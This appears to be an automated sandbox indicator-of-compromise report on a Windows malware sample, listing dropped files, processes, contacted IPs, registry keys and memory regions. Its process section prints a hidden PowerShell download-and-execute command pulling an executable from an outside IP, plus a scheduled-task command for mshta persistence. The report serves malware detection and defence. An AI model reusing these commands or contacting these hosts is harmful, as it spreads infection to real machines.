IOC Report
PUDNz69qBQ.exe

loading gifFilesProcessesURLsIPsRegistryMemdumps1210864201,00010010Label

Files

File Path
Type
Category
Malicious
Download
PUDNz69qBQ.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\TempZILI90OMJCNAFQFTDS7MEORWXLXSKGBX.EXE
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\iExzqhyV9.hta
HTML document, ASCII text, with very long lines (541), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ebhj1o4.ps4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hejk2qz0.lvd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldtc1mzl.ili.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrxg3veq.p0g.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Tasks\skotes.job
data
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\PUDNz69qBQ.exe
"C:\Users\user\Desktop\PUDNz69qBQ.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn I4T8vmamOSJ /tr "mshta C:\Users\user\AppData\Local\Temp\iExzqhyV9.hta" /sc minute /mo 25 /ru "user" /f
malicious
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\user\AppData\Local\Temp\iExzqhyV9.hta
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn I4T8vmamOSJ /tr "mshta C:\Users\user\AppData\Local\Temp\iExzqhyV9.hta" /sc minute /mo 25 /ru "user" /f
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZILI90OMJCNAFQFTDS7MEORWXLXSKGBX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
malicious
C:\Windows\System32\mshta.exe
C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\iExzqhyV9.hta
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZILI90OMJCNAFQFTDS7MEORWXLXSKGBX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
malicious
C:\Users\user\AppData\Local\TempZILI90OMJCNAFQFTDS7MEORWXLXSKGBX.EXE
"C:\Users\user\AppData\Local\TempZILI90OMJCNAFQFTDS7MEORWXLXSKGBX.EXE"
malicious
C:\Users\user\AppData\Local\TempZILI90OMJCNAFQFTDS7MEORWXLXSKGBX.EXE
"C:\Users\user\AppData\Local\TempZILI90OMJCNAFQFTDS7MEORWXLXSKGBX.EXE"
malicious
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
malicious
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
malicious
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://185.215.
unknown
malicious
http://185.215.113.43/Zu7JuNko/index.phpJZ
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
http://185.215.113.43/
unknown
https://contoso.com/Icon
unknown
http://185.215.113.16/mine/random.exe
185.215.113.16
http://185.215.113.43/Zu7JuNko/index.phpy1mb3JtLXVybGVuY29kZWQ=K
unknown
http://185.215.113.43/Zu7JuNko/index.php9.ht
unknown
http://185.215.113.16
unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded
unknown
https://github.com/Pester/Pester
unknown
http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0V
unknown
http://185.215.113.43/Zu7JuNko/index.phpQ
unknown
http://185.215.113.43/Zu7JuNko/index.php
185.215.113.43
http://185.215.113.43/Zu7JuNko/index.phps
unknown
http://185.215.113.43/Zu7JuNko/index.php7
unknown
http://185.215.113.43/Zu7JuNko/index.phpx
unknown
https://aka.ms/pscore6lB
unknown
http://185.215.113.43/Zu7JuNko/index.phpA
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://185.215.113.43/Zu7JuNko/index.phpU.
unknown
http://185.215.113.43/Zu7JuNko/index.php&
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://185.215.113.43/Zu7JuNko/index.php0
unknown
There are 20 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
185.215.113.43
unknown
Portugal
malicious
185.215.113.16
unknown
Portugal
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
C91000
unkown
page execute and read and write
malicious
C91000
unkown
page execute and read and write
malicious
C01000
unkown
page execute and read and write
malicious
C91000
unkown
page execute and read and write
malicious
C01000
unkown
page execute and read and write
malicious
34FF000
stack
page read and write
178E3C54000
heap
page read and write
147C000
heap
page read and write
13043403000
heap
page read and write
1038000
heap
page read and write
2B7C000
stack
page read and write
10C6000
heap
page read and write
7E25000
heap
page read and write
9F6153000
stack
page read and write
69AB000
stack
page read and write
31CF000
stack
page read and write
4CF0000
direct allocation
page execute and read and write
4C10000
direct allocation
page read and write
4630000
direct allocation
page read and write
CFB000
unkown
page execute and read and write
139E000
stack
page read and write
178E3CF2000
heap
page read and write
2F17000
heap
page read and write
7300000
trusted library allocation
page read and write
4C60000
direct allocation
page execute and read and write
696D000
stack
page read and write
11C0000
heap
page read and write
45CF000
stack
page read and write
678E000
stack
page read and write
11E0000
direct allocation
page read and write
FB1000
unkown
page execute and write copy
334F000
stack
page read and write
1650000
direct allocation
page read and write
13043610000
heap
page readonly
7FFD342A6000
trusted library allocation
page read and write
41BF000
stack
page read and write
4630000
direct allocation
page read and write
45D0000
heap
page read and write
1305D607000
heap
page execute and read and write
72C0000
trusted library allocation
page read and write
2F0D000
heap
page read and write
2EF1000
heap
page read and write
414E000
stack
page read and write
12A4000
heap
page read and write
147B000
heap
page read and write
448E000
stack
page read and write
FCA000
heap
page read and write
940000
heap
page read and write
109C000
heap
page read and write
8229000
trusted library allocation
page read and write
1156000
unkown
page execute and write copy
9F6BBB000
stack
page read and write
A50000
heap
page read and write
719E000
stack
page read and write
180E5B5E000
trusted library allocation
page read and write
4801000
heap
page read and write
13043600000
trusted library allocation
page read and write
4801000
heap
page read and write
178E3CF9000
heap
page read and write
84FB000
stack
page read and write
465E000
stack
page read and write
4801000
heap
page read and write
4801000
heap
page read and write
C6B000
unkown
page execute and read and write
4B80000
heap
page read and write
11E0000
direct allocation
page read and write
180E6260000
heap
page read and write
178E3EA6000
heap
page read and write
394F000
stack
page read and write
910000
heap
page read and write
C91000
unkown
page execute and write copy
444F000
stack
page read and write
1305D600000
heap
page execute and read and write
69EE000
stack
page read and write
6FBE000
stack
page read and write
4CE0000
direct allocation
page execute and read and write
CF2000
unkown
page execute and write copy
2F4A000
heap
page read and write
F21000
unkown
page execute and write copy
178E3D26000
heap
page read and write
4C80000
direct allocation
page execute and read and write
348F000
stack
page read and write
4C50000
direct allocation
page execute and read and write
180E5F25000
trusted library allocation
page read and write
54ED000
stack
page read and write
F0A000
unkown
page execute and read and write
380E000
stack
page read and write
5240000
direct allocation
page execute and read and write
13044F65000
heap
page read and write
C90000
unkown
page readonly
7FFD34200000
trusted library allocation
page read and write
10C4000
unkown
page execute and read and write
7F280000
trusted library allocation
page execute and read and write
FCA000
heap
page read and write
31CE000
stack
page read and write
3F4F000
stack
page read and write
318E000
stack
page read and write
F9A000
unkown
page execute and read and write
67CE000
stack
page read and write
970000
direct allocation
page read and write
10AB000
heap
page read and write
C01000
unkown
page execute and write copy
5DD000
stack
page read and write
F54000
heap
page read and write
6810000
heap
page execute and read and write
44CF000
stack
page read and write
7D20000
trusted library allocation
page execute and read and write
57A0CF6000
stack
page read and write
3A3F000
stack
page read and write
12A0000
heap
page read and write
178E3D9E000
heap
page read and write
CF2000
unkown
page execute and read and write
510E000
stack
page read and write
1465000
heap
page read and write
F7E000
heap
page read and write
13043447000
heap
page read and write
3C0000
heap
page read and write
F43000
heap
page read and write
2B95000
heap
page read and write
4C10000
direct allocation
page read and write
4C10000
direct allocation
page read and write
1305D47D000
heap
page read and write
433E000
stack
page read and write
498F000
stack
page read and write
30CE000
stack
page read and write
4801000
heap
page read and write
4801000
heap
page read and write
1450000
heap
page read and write
9F6938000
stack
page read and write
447E000
stack
page read and write
10C6000
unkown
page execute and write copy
178E3BC0000
heap
page read and write
99A000
stack
page read and write
410E000
stack
page read and write
178E3D0E000
heap
page read and write
F53000
heap
page read and write
10C6000
unkown
page execute and write copy
7FFD34420000
trusted library allocation
page read and write
4630000
direct allocation
page read and write
2F3E000
heap
page read and write
180E5E3A000
heap
page read and write
410F000
stack
page read and write
89DC000
stack
page read and write
5721000
trusted library allocation
page read and write
6EA2000
heap
page read and write
970000
direct allocation
page read and write
FA1000
unkown
page execute and read and write
403F000
stack
page read and write
65B0000
trusted library allocation
page execute
680000
heap
page read and write
11E0000
direct allocation
page read and write
180E5E33000
heap
page read and write
F9E000
heap
page read and write
1650000
direct allocation
page read and write
338F000
stack
page read and write
186F000
stack
page read and write
F28000
heap
page read and write
BA4000
heap
page read and write
4DE0000
direct allocation
page execute and read and write
754000
unkown
page readonly
1492000
heap
page read and write
13055717000
trusted library allocation
page read and write
4801000
heap
page read and write
4224000
trusted library allocation
page read and write
15F4000
heap
page read and write
7FFD34460000
trusted library allocation
page read and write
12A4000
heap
page read and write
F6E000
unkown
page execute and read and write
6291000
heap
page read and write
11E0000
direct allocation
page read and write
5150000
direct allocation
page execute and read and write
130433D2000
heap
page read and write
1640000
heap
page read and write
4C60000
direct allocation
page execute and read and write
147B000
heap
page read and write
3D8E000
stack
page read and write
12A4000
heap
page read and write
4C10000
direct allocation
page read and write
2C7F000
stack
page read and write
12A4000
heap
page read and write
4DE0000
direct allocation
page execute and read and write
15F4000
heap
page read and write
CF2000
unkown
page execute and read and write
6D61000
heap
page read and write
2F04000
heap
page read and write
12A4000
heap
page read and write
C01000
unkown
page execute and write copy
F21000
unkown
page execute and read and write
1095000
heap
page read and write
2EA6000
heap
page read and write
1493000
heap
page read and write
FE9000
heap
page read and write
2F4D000
heap
page read and write
6D0E000
stack
page read and write
180E5B80000
heap
page read and write
4801000
heap
page read and write
7FFD34560000
trusted library allocation
page read and write
15F4000
heap
page read and write
178E3D1F000
heap
page read and write
4801000
heap
page read and write
9AB000
heap
page read and write
2F3E000
stack
page read and write
3DFE000
stack
page read and write
5150000
direct allocation
page execute and read and write
14DF000
stack
page read and write
12A4000
heap
page read and write
1347000
heap
page read and write
11E0000
direct allocation
page read and write
424F000
stack
page read and write
4801000
heap
page read and write
146D000
heap
page read and write
1156000
unkown
page execute and write copy
13043630000
heap
page read and write
4801000
heap
page read and write
F9F000
heap
page read and write
453F000
stack
page read and write
4C10000
direct allocation
page read and write
4CA0000
direct allocation
page execute and read and write
15F4000
heap
page read and write
4801000
heap
page read and write
180E5E33000
heap
page read and write
1305D830000
heap
page read and write
4C21000
heap
page read and write
3E0000
heap
page read and write
130433DE000
heap
page read and write
51C0000
direct allocation
page execute and read and write
121E000
heap
page read and write
457E000
stack
page read and write
F11000
unkown
page execute and read and write
70C0000
trusted library allocation
page read and write
41FE000
stack
page read and write
13044F60000
heap
page read and write
4AD0000
direct allocation
page read and write
3A8F000
stack
page read and write
1304341F000
heap
page read and write
1BEE000
stack
page read and write
1013000
heap
page read and write
3250000
direct allocation
page read and write
4801000
heap
page read and write
C91000
unkown
page execute and write copy
7FFD343A1000
trusted library allocation
page read and write
146C000
heap
page read and write
4801000
heap
page read and write
713E000
stack
page read and write
5450000
heap
page read and write
4CA0000
heap
page read and write
180E5E34000
heap
page read and write
2F57000
heap
page read and write
754000
unkown
page readonly
5220000
direct allocation
page execute and read and write
370E000
stack
page read and write
12A4000
heap
page read and write
4CC0000
direct allocation
page execute and read and write
368F000
stack
page read and write
5210000
direct allocation
page execute and read and write
142A000
heap
page read and write
CF2000
unkown
page execute and write copy
130435A0000
heap
page read and write
7052000
heap
page read and write
5570000
direct allocation
page execute and read and write
178E3CD0000
heap
page read and write
4E20000
direct allocation
page execute and read and write
308F000
stack
page read and write
363F000
stack
page read and write
104D000
heap
page read and write
1450000
heap
page read and write
6CC0000
heap
page read and write
178E3EAE000
heap
page read and write
8ADC000
stack
page read and write
C80000
heap
page read and write
4B0E000
stack
page read and write
72F0000
trusted library allocation
page read and write
4801000
heap
page read and write
4630000
direct allocation
page read and write
68DE000
stack
page read and write
4CA4000
heap
page read and write
990000
direct allocation
page read and write
460E000
stack
page read and write
12A4000
heap
page read and write
13045420000
heap
page execute and read and write
12A4000
heap
page read and write
3D4E000
stack
page read and write
178E3EAB000
heap
page read and write
360E000
stack
page read and write
2EC0000
heap
page read and write
81DE000
stack
page read and write
4DE0000
direct allocation
page execute and read and write
FCB000
heap
page read and write
3B8F000
stack
page read and write
2EA0000
heap
page read and write
680E000
stack
page read and write
4630000
direct allocation
page read and write
BA4000
heap
page read and write
2EFF000
stack
page read and write
3DFF000
stack
page read and write
F22000
unkown
page execute and write copy
CFB000
unkown
page execute and read and write
3A3E000
stack
page read and write
5570000
direct allocation
page execute and read and write
147E000
heap
page read and write
7FFD34440000
trusted library allocation
page read and write
4801000
heap
page read and write
F21000
unkown
page execute and read and write
4E30000
direct allocation
page execute and read and write
121A000
heap
page read and write
3B7E000
stack
page read and write
C00000
unkown
page readonly
273E000
stack
page read and write
1057000
heap
page read and write
9F68B8000
stack
page read and write
52D0000
direct allocation
page execute and read and write
130555DF000
trusted library allocation
page read and write
C00000
unkown
page read and write
4641000
heap
page read and write
A2F000
stack
page read and write
FF6000
heap
page read and write
F53000
heap
page read and write
7FFD343C0000
trusted library allocation
page execute and read and write
12A4000
heap
page read and write
BA4000
heap
page read and write
28D3000
heap
page read and write
7D30000
trusted library allocation
page read and write
FED000
heap
page read and write
2EFA000
heap
page read and write
288F000
stack
page read and write
178E3D12000
heap
page read and write
1650000
direct allocation
page read and write
46BF000
stack
page read and write
10BF000
heap
page read and write
1085000
heap
page read and write
1DD0000
heap
page read and write
57A0DFE000
stack
page read and write
2DBF000
stack
page read and write
1305D430000
heap
page read and write
4801000
heap
page read and write
1650000
direct allocation
page read and write
70E000
stack
page read and write
70D0000
trusted library allocation
page read and write
EDE000
unkown
page execute and read and write
11E0000
direct allocation
page read and write
370F000
stack
page read and write
6FA4000
heap
page read and write
4630000
direct allocation
page read and write
DEF000
stack
page read and write
FDE000
heap
page read and write
5784000
trusted library allocation
page read and write
4B1F000
trusted library allocation
page read and write
967000
heap
page read and write
130433E6000
heap
page read and write
180E5B5B000
trusted library allocation
page read and write
178E3CBE000
heap
page read and write
638A000
trusted library allocation
page read and write
15F4000
heap
page read and write
178E3CF2000
heap
page read and write
1086000
heap
page read and write
FB9000
heap
page read and write
F58000
heap
page read and write
6385000
trusted library allocation
page read and write
638E000
trusted library allocation
page read and write
147E000
heap
page read and write
140F000
heap
page read and write
71DF000
stack
page read and write
12A4000
heap
page read and write
FFC000
heap
page read and write
178E3D0E000
heap
page read and write
4810000
heap
page read and write
572E000
stack
page read and write
960000
heap
page read and write
4630000
direct allocation
page read and write
1305D505000
heap
page read and write
681000
unkown
page execute read
105B000
heap
page read and write
2F0D000
heap
page read and write
467F000
stack
page read and write
1056000
heap
page read and write
130435E0000
trusted library allocation
page read and write
702E000
heap
page read and write
BA4000
heap
page read and write
2F57000
heap
page read and write
FE0000
heap
page read and write
FB2000
unkown
page execute and write copy
3287000
heap
page read and write
2E30000
heap
page read and write
7FFD34480000
trusted library allocation
page read and write
1650000
direct allocation
page read and write
448F000
stack
page read and write
5454000
heap
page read and write
1305D4E1000
heap
page read and write
4630000
direct allocation
page read and write
FFD000
heap
page read and write
4C21000
heap
page read and write
7310000
trusted library allocation
page read and write
178E3D1E000
heap
page read and write
3280000
heap
page read and write
4801000
heap
page read and write
7260000
trusted library allocation
page execute and read and write
4801000
heap
page read and write
178E3CDE000
heap
page read and write
9F6ABE000
stack
page read and write
178E3D5F000
heap
page read and write
12A4000
heap
page read and write
7FFD344C0000
trusted library allocation
page read and write
4C10000
direct allocation
page read and write
12A4000
heap
page read and write
163E000
stack
page read and write
147B000
heap
page read and write
70E0000
trusted library allocation
page read and write
2F3E000
heap
page read and write
4801000
heap
page read and write
33FF000
stack
page read and write
9F69BE000
stack
page read and write
5749000
trusted library allocation
page read and write
6FB0000
heap
page read and write
4AD0000
direct allocation
page read and write
15F4000
heap
page read and write
4801000
heap
page read and write
180E5B24000
heap
page read and write
3E3E000
stack
page read and write
313F000
stack
page read and write
33FE000
stack
page read and write
A08000
heap
page read and write
6640000
heap
page read and write
15F4000
heap
page read and write
1431000
heap
page read and write
74C000
unkown
page write copy
1304565D000
trusted library allocation
page read and write
5150000
direct allocation
page execute and read and write
F9E000
heap
page read and write
4C60000
direct allocation
page execute and read and write
45A5000
trusted library allocation
page execute and read and write
178E3C50000
heap
page read and write
4801000
heap
page read and write
6B2B000
stack
page read and write
69F0000
heap
page read and write
7FFD341F3000
trusted library allocation
page execute and read and write
853C000
stack
page read and write
57A14FE000
stack
page read and write
7FFD3424C000
trusted library allocation
page execute and read and write
BA4000
heap
page read and write
5150000
direct allocation
page execute and read and write
6A00000
heap
page read and write
1056000
heap
page read and write
3CCF000
stack
page read and write
424E000
stack
page read and write
180E5B20000
heap
page read and write
A01000
heap
page read and write
970000
direct allocation
page read and write
9C0000
heap
page read and write
50CF000
stack
page read and write
7FFD34520000
trusted library allocation
page read and write
9F657C000
stack
page read and write
3E0F000
stack
page read and write
915000
heap
page read and write
51D0000
direct allocation
page execute and read and write
4239000
trusted library allocation
page read and write
4805000
heap
page read and write
178E3CF8000
heap
page read and write
970000
direct allocation
page read and write
130452B4000
heap
page read and write
BA4000
heap
page read and write
2F3E000
heap
page read and write
178E3CA8000
heap
page read and write
2D0F000
stack
page read and write
4C40000
trusted library allocation
page read and write
39FF000
stack
page read and write
353F000
stack
page read and write
28FF000
heap
page read and write
51FF000
stack
page read and write
5580000
direct allocation
page execute and read and write
40CF000
stack
page read and write
4801000
heap
page read and write
55B0000
direct allocation
page execute and read and write
1305D840000
heap
page read and write
438E000
stack
page read and write
178E3EA0000
heap
page read and write
5610000
trusted library allocation
page read and write
1305D630000
heap
page read and write
3D0F000
stack
page read and write
148E000
heap
page read and write
4801000
heap
page read and write
4801000
heap
page read and write
FB1000
unkown
page execute and write copy
7160000
heap
page read and write
394E000
stack
page read and write
470E000
stack
page read and write
2EFF000
stack
page read and write
15F4000
heap
page read and write
95B000
stack
page read and write
4641000
heap
page read and write
45BE000
stack
page read and write
1086000
heap
page read and write
2DBE000
stack
page read and write
9F667E000
stack
page read and write
36BE000
stack
page read and write
CF9000
unkown
page read and write
5250000
direct allocation
page execute and read and write
7059000
heap
page read and write
2B3F000
stack
page read and write
2BDE000
stack
page read and write
9F64FE000
stack
page read and write
178E3D97000
heap
page read and write
F51000
heap
page read and write
9F760B000
stack
page read and write
3CFE000
stack
page read and write
2780000
heap
page read and write
7D40000
trusted library allocation
page read and write
FA1000
heap
page read and write
4DF0000
direct allocation
page execute and read and write
4A3F000
stack
page read and write
7FFD343B0000
trusted library allocation
page execute and read and write
FCD000
heap
page read and write
493E000
stack
page read and write
132E000
stack
page read and write
F9F000
heap
page read and write
7FA000
stack
page read and write
178E3D24000
heap
page read and write
FA5000
heap
page read and write
2F8C000
stack
page read and write
4C10000
direct allocation
page read and write
2A3E000
stack
page read and write
4801000
heap
page read and write
4CBB000
stack
page read and write
1056000
heap
page read and write
FA4000
heap
page read and write
7DF48E240000
trusted library allocation
page execute and read and write
4C10000
direct allocation
page read and write
1154000
unkown
page execute and read and write
178E3D80000
heap
page read and write
320F000
stack
page read and write
10C6000
heap
page read and write
2F0D000
heap
page read and write
3B3F000
stack
page read and write
60EE000
stack
page read and write
6434000
trusted library allocation
page read and write
534F000
stack
page read and write
6BCB000
stack
page read and write
7FFD344D0000
trusted library allocation
page read and write
5600000
direct allocation
page execute and read and write
9F6A3E000
stack
page read and write
7146000
trusted library allocation
page read and write
12A4000
heap
page read and write
7FFD34500000
trusted library allocation
page read and write
180E5B59000
trusted library allocation
page read and write
428E000
stack
page read and write
307E000
stack
page read and write
119E000
stack
page read and write
4C10000
direct allocation
page read and write
3F3E000
stack
page read and write
16AF000
stack
page read and write
638C000
trusted library allocation
page read and write
FC7000
heap
page read and write
4AB9000
trusted library allocation
page read and write
13043620000
trusted library allocation
page read and write
549F000
stack
page read and write
178E3D39000
heap
page read and write
4F90000
heap
page read and write
F22000
unkown
page execute and write copy
1025000
heap
page read and write
178E3D12000
heap
page read and write
178E3CD1000
heap
page read and write
178E3D84000
heap
page read and write
DBF000
stack
page read and write
180E5E21000
heap
page read and write
680000
unkown
page readonly
36CF000
stack
page read and write
4E50000
direct allocation
page execute and read and write
6C0000
heap
page read and write
2848000
heap
page read and write
55E0000
direct allocation
page execute and read and write
35CF000
stack
page read and write
422D000
trusted library allocation
page execute and read and write
7FFD342B0000
trusted library allocation
page execute and read and write
2A60000
trusted library allocation
page read and write
3BBE000
stack
page read and write
398F000
stack
page read and write
C69000
unkown
page read and write
55F0000
direct allocation
page execute and read and write
11E0000
direct allocation
page read and write
4801000
heap
page read and write
C00000
unkown
page readonly
317F000
stack
page read and write
628F000
heap
page read and write
FAC000
heap
page read and write
100E000
heap
page read and write
970000
direct allocation
page read and write
4ACE000
stack
page read and write
358F000
stack
page read and write
45CE000
stack
page read and write
5580000
heap
page read and write
1154000
unkown
page execute and read and write
70A0000
heap
page execute and read and write
130454B2000
trusted library allocation
page read and write
147E000
heap
page read and write
7E00000
trusted library allocation
page execute and read and write
4C1F000
stack
page read and write
3D4E000
stack
page read and write
3500000
heap
page read and write
4E00000
direct allocation
page execute and read and write
840000
heap
page read and write
BF0000
heap
page read and write
1450000
heap
page read and write
BA4000
heap
page read and write
14FD000
stack
page read and write
3CBF000
stack
page read and write
5140000
direct allocation
page execute and read and write
7E10000
heap
page read and write
4F8F000
stack
page read and write
DFB000
unkown
page execute and read and write
13045431000
trusted library allocation
page read and write
7FFD343AA000
trusted library allocation
page read and write
43CE000
stack
page read and write
715E000
heap
page read and write
13055440000
trusted library allocation
page read and write
F72000
heap
page read and write
180E5B70000
heap
page readonly
C90000
unkown
page readonly
277E000
stack
page read and write
2F2D000
heap
page read and write
557E000
stack
page read and write
6D4E000
stack
page read and write
7DAD000
stack
page read and write
44CE000
stack
page read and write
E60000
heap
page read and write
4C30000
direct allocation
page execute and read and write
3BCE000
stack
page read and write
F6E000
unkown
page execute and read and write
C69000
unkown
page write copy
4C60000
direct allocation
page execute and read and write
2F17000
heap
page read and write
FFC000
heap
page read and write
6285000
heap
page read and write
9A0000
heap
page read and write
4801000
heap
page read and write
178E3D39000
heap
page read and write
5060000
trusted library allocation
page read and write
FBE000
heap
page read and write
4DBF000
stack
page read and write
12A4000
heap
page read and write
10D6000
heap
page read and write
5210000
heap
page read and write
C00000
unkown
page read and write
4AD0000
direct allocation
page read and write
704C000
heap
page read and write
4801000
heap
page read and write
4670000
trusted library allocation
page read and write
70D2000
trusted library allocation
page read and write
178E3D12000
heap
page read and write
6A2E000
stack
page read and write
4801000
heap
page read and write
F53000
heap
page read and write
4801000
heap
page read and write
6815000
heap
page execute and read and write
FAD000
heap
page read and write
4801000
heap
page read and write
1670000
heap
page read and write
4801000
heap
page read and write
3B0E000
stack
page read and write
3E5000
heap
page read and write
109C000
heap
page read and write
4C7C000
stack
page read and write
4801000
heap
page read and write
327F000
stack
page read and write
4801000
heap
page read and write
1305D88B000
heap
page read and write
147B000
heap
page read and write
4B81000
heap
page read and write
10BC000
heap
page read and write
CF2000
unkown
page execute and write copy
420F000
stack
page read and write
9D0000
heap
page read and write
480F000
stack
page read and write
76B000
heap
page read and write
2A70000
heap
page read and write
4CB0000
direct allocation
page execute and read and write
4A80000
trusted library allocation
page read and write
334E000
stack
page read and write
4801000
heap
page read and write
84F0000
heap
page read and write
178E3D22000
heap
page read and write
562D000
stack
page read and write
A00000
heap
page read and write
2F17000
heap
page read and write
400E000
stack
page read and write
3ACE000
stack
page read and write
BA4000
heap
page read and write
180E5F35000
trusted library allocation
page read and write
12A4000
heap
page read and write
4801000
heap
page read and write
4230000
trusted library allocation
page read and write
108F000
heap
page read and write
CFB000
unkown
page execute and read and write
7FFD344F0000
trusted library allocation
page read and write
2F4F000
stack
page read and write
2EFC000
heap
page read and write
37FE000
stack
page read and write
178E3C88000
heap
page read and write
109C000
heap
page read and write
1200000
direct allocation
page read and write
2DE0000
direct allocation
page execute and read and write
4B81000
heap
page read and write
4801000
heap
page read and write
2F38000
heap
page read and write
4801000
heap
page read and write
46FE000
stack
page read and write
178E3D1C000
heap
page read and write
CF9000
unkown
page write copy
6720000
trusted library allocation
page execute and read and write
6C8E000
stack
page read and write
47BF000
stack
page read and write
FFC000
heap
page read and write
703A000
heap
page read and write
32BE000
stack
page read and write
6383000
trusted library allocation
page read and write
324E000
stack
page read and write
7FFD34210000
trusted library allocation
page read and write
5170000
direct allocation
page execute and read and write
FB1000
unkown
page execute and read and write
146C000
heap
page read and write
2ED2000
heap
page read and write
50B0000
direct allocation
page read and write
4E80000
direct allocation
page execute and read and write
1071000
heap
page read and write
BE0000
heap
page read and write
3ECE000
stack
page read and write
5590000
direct allocation
page execute and read and write
4A8F000
trusted library allocation
page read and write
393E000
stack
page read and write
9F647E000
stack
page read and write
72D0000
trusted library allocation
page read and write
4678000
trusted library allocation
page read and write
15F4000
heap
page read and write
685E000
stack
page read and write
430F000
stack
page read and write
4C21000
heap
page read and write
C80000
heap
page read and write
4C0E000
stack
page read and write
5150000
direct allocation
page execute and read and write
13043370000
heap
page read and write
C90000
unkown
page read and write
384E000
stack
page read and write
886F000
stack
page read and write
1650000
direct allocation
page read and write
6646000
heap
page read and write
37BE000
stack
page read and write
72E0000
trusted library allocation
page read and write
2F17000
heap
page read and write
4801000
heap
page read and write
12A4000
heap
page read and write
5570000
direct allocation
page execute and read and write
12A4000
heap
page read and write
970000
direct allocation
page read and write
4E40000
direct allocation
page execute and read and write
17EE000
stack
page read and write
178E3C40000
trusted library allocation
page read and write
2E00000
heap
page read and write
638000
stack
page read and write
F6E000
unkown
page execute and read and write
15F4000
heap
page read and write
37BF000
stack
page read and write
BA4000
heap
page read and write
4C40000
direct allocation
page execute and read and write
180E5E3B000
heap
page read and write
107E000
heap
page read and write
EEE000
stack
page read and write
930000
heap
page read and write
73E000
stack
page read and write
2A77000
heap
page read and write
